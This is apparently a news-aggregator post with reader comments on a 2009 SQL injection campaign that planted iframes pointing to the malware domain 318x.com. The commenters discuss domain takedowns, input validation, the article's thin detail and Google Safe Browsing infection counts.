SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."

318x.com

[NoYob]

I tried to go there and I got this from Google: Diagnostic page for 318x.com [google.com]

After doing a whois, I see that just about all information is described as "Unknown"

Why is this domain still in existence? Can ICANN take it down?

It looks like the sole reason for this domain is for malware.

why don't these go away?

[v1]

If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

How is SQL involved?

[Bromskloss]

The article said "SQL" in the headline, but never mentioned it again after that.

Re:How is SQL involved?

[jDeepbeep]

The article said "SQL" in the headline, but never mentioned it again after that.

My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

No...

[Oxford_Comma_Lover]

The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.

Let's say it all together now...

[gregarican]

validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...

Terrible article, inappropriate headline

[erroneus]

The source of the attacks are servers who have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.

132,000? Try 1269.

[milesw]

As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

http://google.com/safebrowsing/diagnostic?site=318x.com/

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxagri.gov.cn/, glojj.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1269 domain(s), including 37y.org/, cec.org.cn/, jxagri.gov.cn/.